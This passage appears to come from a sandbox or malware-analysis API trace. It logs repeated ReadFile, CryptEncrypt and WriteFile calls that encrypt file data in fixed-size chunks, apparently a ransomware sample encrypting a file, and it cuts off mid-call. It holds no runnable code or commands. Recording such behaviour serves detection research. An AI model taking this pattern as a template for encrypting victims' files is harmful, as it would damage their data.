[0265.592] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.592] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.592] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.592] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.592] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.592] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.593] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.593] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.593] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.593] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.593] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.593] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.593] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.594] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.594] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.594] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.594] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.594] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.594] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.594] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.594] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.594] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.594] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.594] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.594] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.594] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.595] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.595] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.595] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.595] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.595] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.595] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.595] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.595] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.595] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.595] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.595] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.595] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.595] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.596] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.596] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.596] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.596] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.596] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.596] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.596] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.596] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.596] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.596] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.596] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.596] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.596] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.596] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.597] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.597] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.597] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.597] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.597] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.597] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.597] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.597] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.597] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.597] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.597] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.597] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.598] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.598] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.598] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.598] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.598] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.598] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.598] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.598] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.598] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.598] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.598] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.599] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.599] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.599] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.599] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.599] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.599] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.599] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.599] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.599] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.599] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.599] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.599] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.599] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.599] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.599] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.600] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.600] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.600] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.600] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.600] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.600] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.600] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.600] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.600] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.600] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.600] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.600] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.600] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 